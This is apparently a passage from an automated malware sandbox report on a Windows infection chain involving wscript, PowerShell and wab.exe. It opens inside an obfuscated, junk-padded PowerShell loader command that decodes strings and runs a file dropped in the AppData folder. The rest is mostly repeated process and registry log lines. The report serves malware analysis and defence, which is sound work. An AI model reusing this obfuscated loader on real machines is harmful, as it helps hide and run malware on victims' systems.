p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8A09AD push E85E515Dh; ret 1_2_00007FFD9B8A09F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9771C8 push esp; retf 1_2_00007FFD9B9771C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078D08C2 push eax; mov dword ptr [esp], ecx4_2_078D0AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078DB144 push 8B6B39BFh; iretd 4_2_078DB149
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_078D0AB8 push eax; mov dword ptr [esp], ecx4_2_078D0AC4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
